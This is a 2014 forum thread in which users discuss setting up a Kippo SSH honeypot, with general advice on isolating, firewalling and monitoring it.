GuardMoony Posted August 1, 2014 Posted August 1, 2014 Do any of you guys have any experience with kippo ? I'm looking to set up my first honeypot. You know just to see and test out. And i'm wondering if any got some tips / tricks they might want to share. Kind regards, GuardMoony Quote
cooper Posted August 1, 2014 Posted August 1, 2014 I don't know the software. General advice when setting up a Honeypot: 1. Assume the honeypot has been completely compromised from day 1. Monitor the machine by looking at the traffic ONLY. 2. Try to run the install off of read-only media (CD/DVD/write-protected SD/...) so a quick reset will revert any changes anybody may have made. 3. DO NOT set this up on your home network directly accessible via your ISP - they might notice the suspect traffic, assume you've been hacked and shut you off (yup, experience talking here. If it happens to you, call them up and say you've found and completely reinstalled the hacked machine. Blame a family member who'se since had a stern talking to. DO NOT say you're running a honeypot as they'll probably tell you that's against their TOS and it'll take longer for you to get back online). 4. Never, EVER connect to this machine via the network. If you must log on, do so using direct access. Absolutely NOTHING on this machine can refer to anything else you have access to as it'll likely become the next target once the honeypot has been taken. 5. If this machine resides on your network, FIREWALL THE LIVING FUCK out of the connection between it and the rest of the network. See #1. Try to airgap the thing. And of course 6. Report back what you find. It should be pretty interesting. Quote
GuardMoony Posted August 1, 2014 Author Posted August 1, 2014 (edited) 1st off i wont be running on my private internet connection. It will be placed in a datacenter after a firewall. Only port 22 will be configured as forward ( ssh honeypot ) outgoing only the minimum will be allowed. Access to the vps running it will happen over a vpn towards the vps server and then by console ( close to direct as possible ). Might allow trusted community members access to the data. there are some scripts to let it autosend the data/logs by mail. Edited August 1, 2014 by GuardMoony Quote
cooper Posted August 4, 2014 Posted August 4, 2014 What are the services you will activate on the server for any attacker to exploit? Quote
GuardMoony Posted August 5, 2014 Author Posted August 5, 2014 As written above: kippo is only a SSH honeypot so only ssh service will be there. It also simulates a basic shell. And allows for wget/ftp to work. Hench capturing malware/exploits Quote
cooper Posted August 5, 2014 Posted August 5, 2014 Read a bit more about Kippo. It looks pretty nice and it's an interesting concept. I'd be quite interested to know what it turns up. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.